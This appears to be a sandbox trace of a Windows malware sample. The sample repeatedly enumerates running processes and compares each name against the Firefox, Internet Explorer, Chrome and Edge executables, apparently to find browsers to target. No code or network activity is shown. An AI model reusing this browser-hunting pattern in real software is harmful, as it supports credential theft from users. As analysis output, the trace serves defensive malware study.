[0189.771] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0189.771] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0189.771] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.771] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0189.772] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0189.772] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0189.772] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0189.772] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0189.772] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0189.772] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0189.772] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0189.772] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0189.772] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0189.772] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0189.773] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0189.773] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0189.773] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0189.773] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.773] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0189.773] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0189.774] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0189.774] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0189.774] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.774] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0189.774] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0189.774] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0189.774] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0189.774] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.774] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0189.775] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0189.775] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0189.775] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0189.775] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.775] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0189.775] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0189.775] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0189.775] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0189.775] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0189.775] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0189.776] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0189.776] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0189.776] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0189.776] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.776] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0189.776] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0189.776] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0189.776] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0189.776] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.776] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0189.777] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0189.777] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0189.777] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0189.777] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.777] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0189.778] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0189.778] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0189.778] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0189.778] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.778] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0189.778] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0189.778] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0189.778] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0189.778] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.778] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0189.779] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0189.779] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0189.779] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0189.779] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0189.779] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0189.779] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0189.779] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0189.779] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0189.779] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0189.779] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0189.780] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0189.780] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0189.780] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0189.780] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0189.780] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0189.780] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0189.780] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0189.780] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0189.781] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.781] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0189.781] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0189.781] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0189.781] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0189.781] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0189.781] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0189.782] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0189.782] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0189.782] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0189.782] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.782] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0189.782] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0189.782] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0189.782] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0189.782] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.782] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.783] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0189.783] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0189.783] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0189.783] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.783] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0189.783] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0189.783] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0189.783] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0189.783] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.783] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.784] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0189.784] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0189.784] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0189.784] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.784] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0189.785] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0189.785] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0189.785] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0189.785] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.785] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.785] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0189.785] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0189.785] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0189.785] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.785] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0189.786] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0189.786] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0189.786] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0189.786] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0189.786] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0189.786] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0189.786] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0189.786] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0189.786] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.786] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0189.787] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0189.787] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0189.787] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0189.787] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.787] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0189.787] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0189.787] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0189.787] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0189.787] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0189.787] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0189.788] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0189.788] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0189.788] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0189.788] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0189.788] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0189.789] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0189.789] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0189.789] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0189.789] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0189.789] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0189.789] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0189.789] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0189.789] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0189.789] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0189.789] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0189.790] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0189.790] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0189.790] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0189.790] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0189.790] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0189.790] CloseHandle (hObject=0xd4) returned 1 [0189.790] Sleep (dwMilliseconds=0x3e8) [0190.797] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0190.799] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0190.800] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0190.800] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0190.800] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0190.800] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0190.800] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0190.800] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0190.800] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0190.800] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0190.800] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0190.800] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0190.801] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0190.801] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0190.801] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0190.801] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.801] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0190.801] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0190.801] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0190.801] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0190.801] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0190.801] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0190.802] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0190.802] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0190.802] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0190.802] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.802] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0190.802] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0190.802] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0190.802] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0190.803] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0190.803] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0190.803] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0190.803] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0190.803] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0190.803] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.803] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0190.804] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 